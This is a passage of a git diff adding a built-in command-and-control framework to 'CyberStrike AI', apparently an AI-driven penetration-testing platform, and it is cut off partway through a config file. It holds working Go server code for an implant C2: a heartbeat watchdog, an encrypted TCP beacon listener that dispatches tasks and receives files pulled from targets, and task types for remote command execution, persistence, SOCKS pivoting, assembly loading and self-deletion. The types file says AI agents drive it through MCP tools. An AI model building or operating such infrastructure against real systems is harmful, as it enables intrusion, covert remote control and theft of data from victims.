"cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话, +// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。 +// +// 设计要点: +// - 单 goroutine + ticker,避免对每个会话开 timer,session 数量大时也线性 OK; +// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定); +// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判; +// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。 +type SessionWatchdog struct { + manager *Manager + logger *zap.Logger + interval time.Duration // 
扫描周期,默认 15s + minGrace time.Duration // 最小宽限期,默认 30s + gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线) + stopCh chan struct{} +} + +// NewSessionWatchdog 创建看门狗 +func NewSessionWatchdog(m *Manager) *SessionWatchdog { + return &SessionWatchdog{ + manager: m, + logger: m.Logger().With(zap.String("component", "c2-watchdog")), + interval: 15 * time.Second, + minGrace: 30 * time.Second, + gracePct: 3.0, + stopCh: make(chan struct{}), + } +} + +// Run 阻塞执行,直到 ctx.Done() 或 Stop() +func (w *SessionWatchdog) Run(ctx context.Context) { + t := time.NewTicker(w.interval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-w.stopCh: + return + case <-t.C: + w.tick() + } + } +} + +// Stop 停止 +func (w *SessionWatchdog) Stop() { + select { + case <-w.stopCh: + default: + close(w.stopCh) + } +} + +func (w *SessionWatchdog) tick() { + now := time.Now() + for _, status := range []string{string(SessionActive), string(SessionSleeping)} { + sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status}) + if err != nil { + w.logger.Warn("watchdog 列表查询失败", zap.Error(err)) + continue + } + for _, s := range sessions { + if w.isStale(s, now) { + if err := w.manager.MarkSessionDead(s.ID); err != nil { + w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err)) + } + } + } + } +} + +// isStale 判断会话是否超时 +func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool { + // 无心跳记录:以 first_seen_at 兜底 + last := s.LastCheckIn + if last.IsZero() { + last = s.FirstSeenAt + } + sleep := s.SleepSeconds + if sleep <= 0 { + // TCP reverse 模式 sleep=0 → 用最小宽限期判定 + return now.Sub(last) > w.minGrace*2 + } + jitter := s.JitterPercent + if jitter < 0 { + jitter = 0 + } + if jitter > 100 { + jitter = 100 + } + // 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底 + expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second + if expected < w.minGrace { + expected = w.minGrace + } + 
return now.Sub(last) > expected +} diff --git a/c2/tcp_beacon_server.go b/c2/tcp_beacon_server.go new file mode 100644 index 00000000..63803b32 --- /dev/null +++ b/c2/tcp_beacon_server.go @@ -0,0 +1,267 @@ +package c2 + +import ( + "bufio" + "crypto/subtle" + "encoding/base64" + "encoding/binary" + "encoding/json" + "fmt" + "io" + "net" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。 +const tcpBeaconMagic = "CSB1" + +// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。 +const tcpBeaconMaxFrame = 64 << 20 + +func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) { + var n uint32 + if err = binary.Read(r, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) { + return "", fmt.Errorf("invalid tcp beacon frame size") + } + buf := make([]byte, n) + if _, err = io.ReadFull(r, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error { + if mu != nil { + mu.Lock() + defer mu.Unlock() + } + payload := []byte(cipherB64) + if len(payload) > tcpBeaconMaxFrame { + return fmt.Errorf("frame too large") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(payload))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(payload) + return err +} + +func tcpBeaconCheckToken(expected, got string) bool { + if got == "" || expected == "" { + return false + } + return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1 +} + +// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。 +func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) { + var writeMu sync.Mutex + defer func() { + _ = conn.Close() + }() + + for { + _ = conn.SetReadDeadline(time.Now().Add(6 
* time.Minute)) + cipherB64, err := readTCPBeaconFrame(br) + if err != nil { + if err != io.EOF && !isClosedConnErr(err) { + l.logger.Debug("tcp beacon read frame", zap.Error(err)) + } + return + } + plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64) + if err != nil { + l.logger.Warn("tcp beacon decrypt failed", zap.Error(err)) + return + } + + var env map[string]json.RawMessage + if err := json.Unmarshal(plain, &env); err != nil { + l.logger.Warn("tcp beacon json", zap.Error(err)) + return + } + opBytes, ok := env["op"] + if !ok { + return + } + var op string + if err := json.Unmarshal(opBytes, &op); err != nil { + return + } + var token string + if tb, ok := env["token"]; ok { + _ = json.Unmarshal(tb, &token) + } + if !tcpBeaconCheckToken(l.rec.ImplantToken, token) { + l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID)) + return + } + + var resp interface{} + switch op { + case "check_in": + rawCheck, ok := env["check"] + if !ok { + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(rawCheck, &req); err != nil { + return + } + if req.UserAgent == "" { + req.UserAgent = "tcp_beacon" + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + host, _, _ := net.SplitHostPort(conn.RemoteAddr().String()) + if req.Metadata == nil { + req.Metadata = map[string]interface{}{} + } + req.Metadata["transport"] = "tcp_beacon" + req.Metadata["remote"] = conn.RemoteAddr().String() + if strings.TrimSpace(req.InternalIP) == "" { + req.InternalIP = host + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + l.logger.Warn("tcp beacon check_in", zap.Error(err)) + return + } + queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: session.ID, + Status: string(TaskQueued), + Limit: 1, + }) + resp = ImplantCheckInResponse{ + SessionID: session.ID, + NextSleep: session.SleepSeconds, + NextJitter: session.JitterPercent, + HasTasks: len(queued) > 0, + ServerTime: 
NowUnixMillis(), + } + + case "tasks": + rawSID, ok := env["session_id"] + if !ok { + return + } + var sessionID string + if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" { + return + } + sess, err := l.manager.DB().GetC2Session(sessionID) + if err != nil || sess == nil || sess.ListenerID != l.rec.ID { + return + } + envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50) + if err != nil { + return + } + if envelopes == nil { + envelopes = []TaskEnvelope{} + } + resp = map[string]interface{}{"tasks": envelopes} + + case "result": + raw, ok := env["result"] + if !ok { + return + } + var report TaskResultReport + if err := json.Unmarshal(raw, &report); err != nil { + return + } + if err := l.manager.IngestTaskResult(report); err != nil { + return + } + resp = map[string]string{"ok": "1"} + + case "upload": + raw, ok := env["upload"] + if !ok { + return + } + var up struct { + TaskID string `json:"task_id"` + DataB64 string `json:"data_b64"` + } + if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" { + return + } + plainFile, err := base64.StdEncoding.DecodeString(up.DataB64) + if err != nil { + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + return + } + dst := filepath.Join(dir, up.TaskID+".bin") + if err := os.WriteFile(dst, plainFile, 0o644); err != nil { + return + } + resp = map[string]interface{}{"ok": 1, "size": len(plainFile)} + + case "file": + raw, ok := env["file"] + if !ok { + return + } + var fr struct { + FileID string `json:"file_id"` + } + if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" { + return + } + if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") { + return + } + fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin") + absPath, err := filepath.Abs(fpath) + if err != nil { + return + } + absDir, err := 
filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream")) + if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) { + return + } + data, err := os.ReadFile(absPath) + if err != nil { + return + } + resp = map[string]interface{}{ + "file_data": base64Encode(data), + } + + default: + return + } + + body, err := json.Marshal(resp) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + _ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute)) + if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil { + return + } + } +} diff --git a/c2/types.go b/c2/types.go new file mode 100644 index 00000000..6025671b --- /dev/null +++ b/c2/types.go @@ -0,0 +1,258 @@ +// Package c2 实现 CyberStrikeAI 内置 C2(Command & Control)框架。 +// +// 设计概述: +// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件 +// (HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。 +// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket +// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。 +// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合: +// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复; +// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。 +// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有 +// 和编译期注入到 implant,事件流不允许导出明文密钥。 +package c2 + +import ( + "errors" + "strings" + "time" +) + +// ListenerType 监听器类型,与 c2_listeners.type 字段一致 +type ListenerType string + +const ( + ListenerTypeTCPReverse ListenerType = "tcp_reverse" + ListenerTypeHTTPBeacon ListenerType = "http_beacon" + ListenerTypeHTTPSBeacon ListenerType = "https_beacon" + ListenerTypeWebSocket ListenerType = "websocket" +) + +// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举 +func AllListenerTypes() []ListenerType { + return []ListenerType{ + ListenerTypeTCPReverse, + ListenerTypeHTTPBeacon, + ListenerTypeHTTPSBeacon, + ListenerTypeWebSocket, + } +} + +// IsValidListenerType 校验前端/MCP 入参是否为合法 type +func IsValidListenerType(t string) bool { + t = 
strings.ToLower(strings.TrimSpace(t)) + for _, lt := range AllListenerTypes() { + if string(lt) == t { + return true + } + } + return false +} + +// SessionStatus 与 c2_sessions.status 一致 +type SessionStatus string + +const ( + SessionActive SessionStatus = "active" + SessionSleeping SessionStatus = "sleeping" + SessionDead SessionStatus = "dead" + SessionKilled SessionStatus = "killed" +) + +// TaskStatus 与 c2_tasks.status 一致 +type TaskStatus string + +const ( + TaskQueued TaskStatus = "queued" + TaskSent TaskStatus = "sent" + TaskRunning TaskStatus = "running" + TaskSuccess TaskStatus = "success" + TaskFailed TaskStatus = "failed" + TaskCancelled TaskStatus = "cancelled" +) + +// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串) +type TaskType string + +const ( + // 通用任务 + TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c) + TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd) + TaskTypePwd TaskType = "pwd" // 当前目录 + TaskTypeCd TaskType = "cd" // 切目录 + TaskTypeLs TaskType = "ls" // 列目录 + TaskTypePs TaskType = "ps" // 列进程 + TaskTypeKillProc TaskType = "kill_proc" // 杀进程 + TaskTypeUpload TaskType = "upload" // 推文件到目标 + TaskTypeDownload TaskType = "download" // 拉文件回本机 + TaskTypeScreenshot TaskType = "screenshot" // 截图 + TaskTypeSleep TaskType = "sleep" // 调整心跳节律 + TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制) + TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理) + // 高级任务 + TaskTypePortFwd TaskType = "port_fwd" + TaskTypeSocksStart TaskType = "socks_start" + TaskTypeSocksStop TaskType = "socks_stop" + TaskTypeLoadAssembly TaskType = "load_assembly" + TaskTypePersist TaskType = "persist" +) + +// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum +func AllTaskTypes() []TaskType { + return []TaskType{ + TaskTypeExec, TaskTypeShell, + TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc, + TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot, + TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, 
TaskTypeLoadAssembly, + TaskTypePersist, + } +} + +// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型; +// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。 +func IsDangerousTaskType(t TaskType) bool { + switch t { + case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete, + TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist: + return true + } + return false +} + +// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json) +type ListenerConfig struct { + // HTTP/HTTPS Beacon 公共字段 + BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in" + BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks" + BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result" + BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload" + BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/" + // HTTPS 专属 + TLSCertPath string `json:"tls_cert_path,omitempty"` + TLSKeyPath string `json:"tls_key_path,omitempty"` + TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签 + // 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写) + DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5 + DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0 + // OPSEC:可选命令黑名单(正则) + CommandDenyRegex []string `json:"command_deny_regex,omitempty"` + // 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制) + MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"` + // CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景 + CallbackHost string `json:"callback_host,omitempty"` +} + +// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值 +func (c *ListenerConfig) ApplyDefaults() { + if strings.TrimSpace(c.BeaconCheckInPath) == "" { + c.BeaconCheckInPath = "/check_in" + } + if strings.TrimSpace(c.BeaconTasksPath) == "" { + c.BeaconTasksPath = "/tasks" + } + if strings.TrimSpace(c.BeaconResultPath) == "" { + c.BeaconResultPath = "/result" + } + if 
strings.TrimSpace(c.BeaconUploadPath) == "" { + c.BeaconUploadPath = "/upload" + } + if strings.TrimSpace(c.BeaconFilePath) == "" { + c.BeaconFilePath = "/file/" + } + if c.DefaultSleep <= 0 { + c.DefaultSleep = 5 + } + if c.DefaultJitter < 0 { + c.DefaultJitter = 0 + } + if c.DefaultJitter > 100 { + c.DefaultJitter = 100 + } +} + +// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文) +type ImplantCheckInRequest struct { + ImplantUUID string `json:"uuid"` + Hostname string `json:"hostname"` + Username string `json:"username"` + OS string `json:"os"` + Arch string `json:"arch"` + PID int `json:"pid"` + ProcessName string `json:"process_name"` + IsAdmin bool `json:"is_admin"` + InternalIP string `json:"internal_ip"` + UserAgent string `json:"user_agent,omitempty"` + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + Metadata map[string]interface{} `json:"metadata,omitempty"` +} + +// ImplantCheckInResponse 服务端回执 +type ImplantCheckInResponse struct { + SessionID string `json:"session_id"` + NextSleep int `json:"next_sleep"` + NextJitter int `json:"next_jitter"` + HasTasks bool `json:"has_tasks"` + ServerTime int64 `json:"server_time"` +} + +// TaskEnvelope 服务端 → beacon 的任务派发载体 +type TaskEnvelope struct { + TaskID string `json:"task_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` +} + +// TaskResultReport beacon → 服务端的任务结果回传 +type TaskResultReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制 + BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png" + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码 +type CommonError struct { + Code string + Message string + HTTP int +} + +func (e *CommonError) Error() string { + if e == nil { + return "" + } 
+ return e.Message +} + +// Sentinel errors,便于 errors.Is 比较 +var ( + ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404} + ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404} + ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404} + ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404} + ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400} + ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401} + ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409} + ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409} + ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409} + ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400} +) + +// SafeBindPort 校验端口范围 +func SafeBindPort(port int) error { + if port < 1 || port > 65535 { + return errors.New("port must be in 1..65535") + } + return nil +} + +// NowUnixMillis 统一时间戳工具 +func NowUnixMillis() int64 { + return time.Now().UnixNano() / int64(time.Millisecond) +} diff --git a/config/config.go b/config/config.go new file mode 100644 index 00000000..08105ab9 --- /dev/null +++ b/config/config.go @@ -0,0 +1,1304 @@ +package config + +import ( + "crypto/rand" + "encoding/base64" + "encoding/hex" + "encoding/json" + "fmt" + "os" + "path/filepath" + "strconv" + "strings" + + "gopkg.in/yaml.v3" +) + +type Config struct { + Version string `yaml:"version,omitempty" json:"version,omitempty"` // 前端显示的版本号,如 v1.3.3 + Server ServerConfig `yaml:"server"` + Log LogConfig `yaml:"log"` + MCP MCPConfig `yaml:"mcp"` + OpenAI OpenAIConfig `yaml:"openai"` + FOFA FofaConfig `yaml:"fofa,omitempty" json:"fofa,omitempty"` + Agent AgentConfig `yaml:"agent"` + Hitl HitlConfig `yaml:"hitl,omitempty" json:"hitl,omitempty"` + 
Security SecurityConfig `yaml:"security"` + Database DatabaseConfig `yaml:"database"` + Auth AuthConfig `yaml:"auth"` + ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"` + Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"` + C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用 + Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置 + RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式) + Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色 + SkillsDir string `yaml:"skills_dir,omitempty" json:"skills_dir,omitempty"` // Skills配置文件目录 + AgentsDir string `yaml:"agents_dir,omitempty" json:"agents_dir,omitempty"` // 多代理子 Agent Markdown 定义目录(*.md,YAML front matter) + MultiAgent MultiAgentConfig `yaml:"multi_agent,omitempty" json:"multi_agent,omitempty"` +} + +// MultiAgentConfig 基于 CloudWeGo Eino adk/prebuilt 的多代理编排(deep | plan_execute | supervisor,与单 Agent /agent-loop 并存)。 +type MultiAgentConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + RobotUseMultiAgent bool `yaml:"robot_use_multi_agent" json:"robot_use_multi_agent"` // 为 true 时钉钉/飞书/企微机器人走 Eino 多代理 + BatchUseMultiAgent bool `yaml:"batch_use_multi_agent" json:"batch_use_multi_agent"` // 为 true 时批量任务队列中每子任务走 Eino 多代理 + // Orchestration 已弃用:保留仅兼容旧版 config.yaml;编排由聊天/WebShell 请求体 orchestration 决定,未传时按 deep。 + Orchestration string `yaml:"orchestration,omitempty" json:"orchestration,omitempty"` + MaxIteration int `yaml:"max_iteration" json:"max_iteration"` // 主代理 / 执行器最大推理轮次(Deep、Supervisor、plan_execute 的 Executor) + // PlanExecuteLoopMaxIterations plan_execute 模式下 execute↔replan 外层循环上限;0 表示用 Eino 默认 10。 + PlanExecuteLoopMaxIterations int `yaml:"plan_execute_loop_max_iterations,omitempty" json:"plan_execute_loop_max_iterations,omitempty"` + SubAgentMaxIterations int `yaml:"sub_agent_max_iterations" json:"sub_agent_max_iterations"` + WithoutGeneralSubAgent 
bool `yaml:"without_general_sub_agent" json:"without_general_sub_agent"` + WithoutWriteTodos bool `yaml:"without_write_todos" json:"without_write_todos"` + OrchestratorInstruction string `yaml:"orchestrator_instruction" json:"orchestrator_instruction"` + // OrchestratorInstructionPlanExecute plan_execute 主代理(规划侧)系统提示;非空且 agents/orchestrator-plan-execute.md 正文为空或未存在时生效。不与 Deep 的 orchestrator_instruction 混用。 + OrchestratorInstructionPlanExecute string `yaml:"orchestrator_instruction_plan_execute,omitempty" json:"orchestrator_instruction_plan_execute,omitempty"` + // OrchestratorInstructionSupervisor supervisor 主代理系统提示(transfer/exit 说明仍由运行追加);非空且 agents/orchestrator-supervisor.md 正文为空或未存在时生效。 + OrchestratorInstructionSupervisor string `yaml:"orchestrator_instruction_supervisor,omitempty" json:"orchestrator_instruction_supervisor,omitempty"` + SubAgents []MultiAgentSubConfig `yaml:"sub_agents" json:"sub_agents"` + // SubAgentUserContextMaxRunes caps the user-context supplement appended to task descriptions for sub-agents. + // 0 (default) uses the built-in default of 2000 runes; negative value disables injection entirely. + SubAgentUserContextMaxRunes int `yaml:"sub_agent_user_context_max_runes,omitempty" json:"sub_agent_user_context_max_runes,omitempty"` + // EinoSkills configures CloudWeGo Eino ADK skill middleware + optional local filesystem/execute on DeepAgent. + EinoSkills MultiAgentEinoSkillsConfig `yaml:"eino_skills,omitempty" json:"eino_skills,omitempty"` + // EinoMiddleware wires optional ADK middleware (patchtoolcalls, toolsearch, plantask, reduction) and Deep extras. + EinoMiddleware MultiAgentEinoMiddlewareConfig `yaml:"eino_middleware,omitempty" json:"eino_middleware,omitempty"` + // EinoCallbacks attaches CloudWeGo eino callbacks.InitCallbacks on ADK Runner context (structured logs + optional SSE trace). 
+ EinoCallbacks MultiAgentEinoCallbacksConfig `yaml:"eino_callbacks,omitempty" json:"eino_callbacks,omitempty"` +} + +// MultiAgentEinoCallbacksConfig enables Eino unified callbacks on each ADK agent run (deep / plan_execute / supervisor / eino_single). +// Modes: log_only (zap + optional OTel; no SSE to browser), sse (adds client SSE eino_trace_* when sse_trace_to_client), full (sse rules + stream callback copies closed). +type MultiAgentEinoCallbacksConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` // log_only | sse | full; empty with enabled=true defaults to log_only + // SseTraceToClient when true emits eino_trace_* SSE for UI (use only for admin/debug; nil/false recommended in production). + SseTraceToClient *bool `yaml:"sse_trace_to_client,omitempty" json:"sse_trace_to_client,omitempty"` + // Otel configures OpenTelemetry trace export (independent of mode; exporter none disables export even if enabled). + Otel MultiAgentEinoCallbacksOtelConfig `yaml:"otel,omitempty" json:"otel,omitempty"` + // MaxInputSummaryRunes / MaxOutputSummaryRunes cap text placed in SSE payloads and debug logs (not full payloads). + MaxInputSummaryRunes int `yaml:"max_input_summary_runes,omitempty" json:"max_input_summary_runes,omitempty"` + MaxOutputSummaryRunes int `yaml:"max_output_summary_runes,omitempty" json:"max_output_summary_runes,omitempty"` + // ZapVerbose when true logs input/output summaries at zap.Debug on start/end; false uses Info with short fields only. + ZapVerbose bool `yaml:"zap_verbose,omitempty" json:"zap_verbose,omitempty"` +} + +// MultiAgentEinoCallbacksOtelConfig OpenTelemetry for Eino callback spans (W3C trace in collector / stdout). 
+type MultiAgentEinoCallbacksOtelConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + ServiceName string `yaml:"service_name,omitempty" json:"service_name,omitempty"` + Exporter string `yaml:"exporter,omitempty" json:"exporter,omitempty"` // none | stdout | otlphttp + OTLPEndpoint string `yaml:"otlp_endpoint,omitempty" json:"otlp_endpoint,omitempty"` // host:port, e.g. localhost:4318 (path /v1/traces) + SampleRatio float64 `yaml:"sample_ratio,omitempty" json:"sample_ratio,omitempty"` // 0–1, default 1.0 +} + +// EinoCallbacksModeEffective returns off | log_only | sse | full. +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksModeEffective() string { + if !c.Enabled { + return "off" + } + m := strings.TrimSpace(strings.ToLower(c.Mode)) + switch m { + case "log_only": + return "log_only" + case "sse": + return "sse" + case "full": + return "full" + case "": + return "log_only" + default: + return "log_only" + } +} + +// SseTraceToClientEffective is false unless explicitly set true (best practice: do not expose framework traces to end users by default). +func (c MultiAgentEinoCallbacksConfig) SseTraceToClientEffective() bool { + if c.SseTraceToClient == nil { + return false + } + return *c.SseTraceToClient +} + +// ShouldEmitEinoTraceSSE is true when client-visible trace events should be sent over progress/SSE. +func (c MultiAgentEinoCallbacksConfig) ShouldEmitEinoTraceSSE(mode string) bool { + if !c.SseTraceToClientEffective() { + return false + } + return mode == "sse" || mode == "full" +} + +// OtelExporterEffective returns none | stdout | otlphttp. +func (c MultiAgentEinoCallbacksOtelConfig) OtelExporterEffective() string { + e := strings.TrimSpace(strings.ToLower(c.Exporter)) + switch e { + case "none", "stdout", "otlphttp": + return e + case "": + if c.Enabled { + return "stdout" + } + return "none" + default: + return "none" + } +} + +// OtelTracingActive is true when spans should be started (enabled + non-none exporter). 
+func (c MultiAgentEinoCallbacksConfig) OtelTracingActive() bool { + if !c.Otel.Enabled { + return false + } + return c.Otel.OtelExporterEffective() != "none" +} + +func (c MultiAgentEinoCallbacksOtelConfig) ServiceNameEffective() string { + s := strings.TrimSpace(c.ServiceName) + if s != "" { + return s + } + return "cyberstrike-ai" +} + +func (c MultiAgentEinoCallbacksOtelConfig) SampleRatioEffective() float64 { + r := c.SampleRatio + if r <= 0 { + return 1.0 + } + if r > 1 { + return 1.0 + } + return r +} + +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxInputSummaryRunes() int { + if c.MaxInputSummaryRunes > 0 { + return c.MaxInputSummaryRunes + } + return 400 +} + +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxOutputSummaryRunes() int { + if c.MaxOutputSummaryRunes > 0 { + return c.MaxOutputSummaryRunes + } + return 400 +} + +// MultiAgentEinoMiddlewareConfig optional Eino ADK middleware and Deep / supervisor tuning. +type MultiAgentEinoMiddlewareConfig struct { + // PatchToolCalls inserts placeholder tool results for dangling assistant tool_calls (nil = enabled). + PatchToolCalls *bool `yaml:"patch_tool_calls,omitempty" json:"patch_tool_calls,omitempty"` + // ToolSearch enables dynamictool/toolsearch: hide tail tools until model calls tool_search (reduces prompt tools). + ToolSearchEnable bool `yaml:"tool_search_enable,omitempty" json:"tool_search_enable,omitempty"` + ToolSearchMinTools int `yaml:"tool_search_min_tools,omitempty" json:"tool_search_min_tools,omitempty"` // default 20; applies when len(tools) >= this + ToolSearchAlwaysVisible int `yaml:"tool_search_always_visible,omitempty" json:"tool_search_always_visible,omitempty"` // default 12; first N tools stay always visible + // ToolSearchAlwaysVisibleTools keeps specified tool names always visible (never hidden by tool_search). 
+ ToolSearchAlwaysVisibleTools []string `yaml:"tool_search_always_visible_tools,omitempty" json:"tool_search_always_visible_tools,omitempty"` + // Plantask adds TaskCreate/Get/Update/List (file-backed under skills dir); requires eino_skills + local backend. + PlantaskEnable bool `yaml:"plantask_enable,omitempty" json:"plantask_enable,omitempty"` + // PlantaskRelDir relative to skills_dir for per-conversation task boards (default .eino/plantask). + PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"` + // Reduction truncates/offloads large tool outputs (requires eino local backend for Write). + ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"` + ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id + ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000 + ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000 + ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"` + ReductionSubAgents bool `yaml:"reduction_sub_agents,omitempty" json:"reduction_sub_agents,omitempty"` // also attach to sub-agents + // SummarizationTriggerRatio controls summarization trigger threshold as max_total_tokens * ratio (default 0.8). + SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" 